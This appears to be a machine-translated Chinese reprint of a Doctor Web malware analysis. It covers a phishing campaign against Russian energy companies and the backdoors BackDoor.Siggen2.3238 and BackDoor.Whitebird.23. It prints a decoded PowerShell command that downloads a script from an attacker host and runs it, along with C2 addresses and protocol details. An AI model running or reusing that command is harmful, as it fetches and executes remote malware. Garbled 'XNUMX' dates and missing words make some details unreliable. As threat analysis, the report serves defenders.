我們調查電腦安全事件的經驗表明,電子郵件仍然是攻擊者最初滲透受攻擊網路基礎設施的最常見管道之一。 對可疑(或不那麼可疑)信件的粗心操作會成為進一步感染的切入點,這就是網路犯罪分子積極使用社會工程方法的原因,儘管取得了不同程度的成功。
在這篇文章中,我們想談談我們最近對針對俄羅斯燃料和能源綜合體多家企業的垃圾郵件活動的調查。 所有攻擊都遵循相同的場景,使用虛假電子郵件,而且似乎沒有人對這些電子郵件的文字內容投入太多精力。
拉茲韋德卡
這一切都始於 2020 年 XNUMX 月底,當時 Doctor Web 病毒分析師檢測到一次垃圾郵件活動,其中駭客向俄羅斯燃料和能源綜合體多家企業的員工發送了更新的電話簿。 當然,這並不是簡單的關心,因為該目錄不是真實的,並且 .docx 文件從遠端資源下載了兩個映像。
其中一份是從 news[.]zannews[.]com 伺服器下載到使用者的電腦上的。 值得注意的是,該網域與哈薩克反腐敗媒體中心的網域類似—zannews[.]kz。 另一方面,所使用的網域立即讓人想起 2015 年的另一個名為 TOPNEWS 的活動,該活動使用了 ICEFOG 後門,並擁有名稱中帶有子字串「news」的木馬控制域。 另一個有趣的功能是,當向不同收件者發送電子郵件時,下載映像的請求使用不同的請求參數或唯一的映像名稱。
我們認為這樣做的目的是收集資訊以識別「可靠」的收件人,然後保證他在正確的時間打開這封信。 SMB 協定用於從第二台伺服器下載映像,這可以從開啟收到文件的員工的電腦中收集 NetNTLM 雜湊值。
這是信本身和假目錄:
今年2019月,駭客開始使用新網域sports[.]manhajnews[.]com來上傳圖片。 分析顯示,至少自 XNUMX 年 XNUMX 月起,manhajnews[.]com 子網域就已用於垃圾郵件。 這次活動的目標之一是俄羅斯一所大型大學。
此外,到了 XNUMX 月,攻擊的組織者為他們的信函提出了新的文本:這次文件包含有關行業發展的資訊。 信中的文字清楚地表明,其作者不是俄語的母語,就是故意給自己製造這樣的印象。 不幸的是,產業發展的想法一如既往,結果只是一個幌子——文件再次下載了兩張圖片,而伺服器則改為download[.]inklingpaper[.]com。
下一次創新是在七月。 為了繞過防毒程式對惡意文件的偵測,攻擊者開始使用使用密碼加密的 Microsoft Word 文件。 同時,攻擊者決定使用經典的社會工程技術——獎勵通知。
上訴案的文字再次採用同樣的風格,這引起了收件人的進一步懷疑。 下載圖像的伺服器也沒有改變。
請注意,在所有情況下,均使用在 mail[.]ru 和 yandex[.]ru 網域上註冊的電子郵件信箱來寄送信件。
攻擊
到 2020 年 XNUMX 月初,是時候採取行動了。 我們的病毒分析師記錄了新一波攻擊,攻擊者再次以更新電話簿為藉口發送信件。 然而,這次附件包含惡意巨集。
開啟附加文件時,巨集建立了兩個檔案:
- VBS 腳本 %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs,用於啟動批次檔;
- 批次檔本身為 %APPDATA%configstest.bat,已混淆。
其工作的本質歸結為使用某些參數啟動 Powershell shell。 傳遞給 shell 的參數被解碼為命令:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;根據所提供的命令,下載有效負載的網域再次偽裝成新聞網站。 一個簡單的 ,其唯一任務是從命令和控制伺服器接收 shellcode 並執行它。 我們能夠辨識出兩種可以安裝在受害者電腦上的後門。
後門.Siggen2.3238
第一個是 後門.Siggen2.3238 — 我們的專家以前沒有遇到過,其他防毒供應商也沒有提到這個程式。
程式是用C++寫的後門程序,運行在32位元Windows作業系統上。
後門.Siggen2.3238 能夠使用兩種協定與管理伺服器進行通訊:HTTP 和 HTTPS。 測試樣本使用HTTPS協定。 以下用戶代理用於向伺服器發出請求:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
在這種情況下,所有請求都提供以下參數集:
%s;type=%s;length=%s;realdata=%send
其中每行 %s 相應地替換為:
- 受感染電腦的 ID、
- 發送的請求類型,
- realdata 欄位中的資料長度,
- 數據。
在收集有關受感染系統的資訊的階段,後門會產生如下行:
lan=%s;cmpname=%s;username=%s;version=%s;
其中 lan 是受感染電腦的 IP 位址,cmpname 是電腦名稱,username 是使用者名,version 是行 0.0.4.03。
此帶有 sysinfo 識別碼的資訊透過 POST 請求傳送至位於 https[:]//31.214[.]157.14/log.txt 的控制伺服器。 如果回應 後門.Siggen2.3238 收到HEART訊號,則認為連線成功,後門開始與伺服器通訊的主週期。
更完整的工作原理描述 後門.Siggen2.3238 是在我們的 .
後門.Whitebird.23
第二個程序是對 BackDoor.Whitebird 後門的修改,我們已經從哈薩克斯坦一家政府機構的事件中了解到該後門。 該版本是用 C++ 編寫的,旨在在 32 位元和 64 位元 Windows 作業系統上運行。
與大多數此類程序一樣, 後門.Whitebird.23 旨在與控制伺服器建立加密連線並對受感染的電腦進行未經授權的控制。 使用滴管安裝到受感染的系統中 .
我們檢查的樣本是一個具有兩個導出的惡意庫:
- 谷歌遊戲
- 試驗。
在工作開始時,它使用基於位元組 0x99 的 XOR 運算的演算法來解密硬連線到後門主體中的配置。 配置如下:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
為了確保其持續運行,後門會變更欄位中指定的值 工作時間 配置。 此欄位包含1440個位元組,取值0或1,代表一天中每小時的每一分鐘。 為每個網路介面建立一個單獨的線程,用於偵聽該介面並在代理伺服器上尋找來自受感染電腦的授權資料包。 當偵測到此類資料包時,後門會將有關代理伺服器的資訊新增至其清單。 此外,也透過 WinAPI 檢查代理是否存在 網際網路查詢選項W.
程序檢查當前的分鐘和小時,並將其與現場數據進行比較 工作時間 配置。 如果當天相應分鐘的值不為零,則與控制伺服器建立連線。
建立與伺服器的連線模擬在客戶端和伺服器之間使用 TLS 版本 1.0 協定建立連線。 後門的主體包含兩個緩衝區。
第一個緩衝區包含 TLS 1.0 用戶端 Hello 封包。
第二個緩衝區包含金鑰長度為 1.0x0 位元組的 TLS 100 用戶端金鑰交換封包、變更密碼規格、加密握手訊息。
後門在發送Client Hello資料包時,會在Client Random欄位中寫入4個位元組的當前時間和28個位元組的偽隨機數據,計算如下:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
接收到的資料包被傳送到控制伺服器。 回應(伺服器 Hello 資料包)檢查:
- 符合TLS協議1.0版;
- 客戶端指定的時間戳記(隨機資料包欄位的前4個位元組)與伺服器指定的時間戳記的對應關係;
- 客戶端和伺服器的隨機資料欄位中時間戳後的前 4 個位元組的匹配。
如果指定的匹配項,後門會準備客戶端金鑰交換資料包。 為此,它修改客戶端金鑰交換包中的公鑰,以及加密握手訊息包中的加密 IV 和加密資料。
然後,後門從命令和控制伺服器接收資料包,檢查 TLS 協定版本是否為 1.0,然後接受另外 54 個位元組(資料包的正文)。 這樣就完成連接設定了。
更完整的工作原理描述 後門.Whitebird.23 是在我們的 .
結論與結論
透過對文件、惡意軟體和所使用的基礎設施的分析,我們可以自信地說,這次攻擊是由中國 APT 組織之一策劃的。 考慮到攻擊成功後安裝在受害者電腦上的後門的功能,感染至少會導致受攻擊組織的電腦上的機密資訊被盜。
此外,一種很可能的情況是在本地伺服器上安裝具有特殊功能的專門木馬。 這些可以是網域控制器、郵件伺服器、Internet 網關等。正如我們在範例中看到的 ,由於各種原因,攻擊者對此類伺服器特別感興趣。
來源: www.habr.com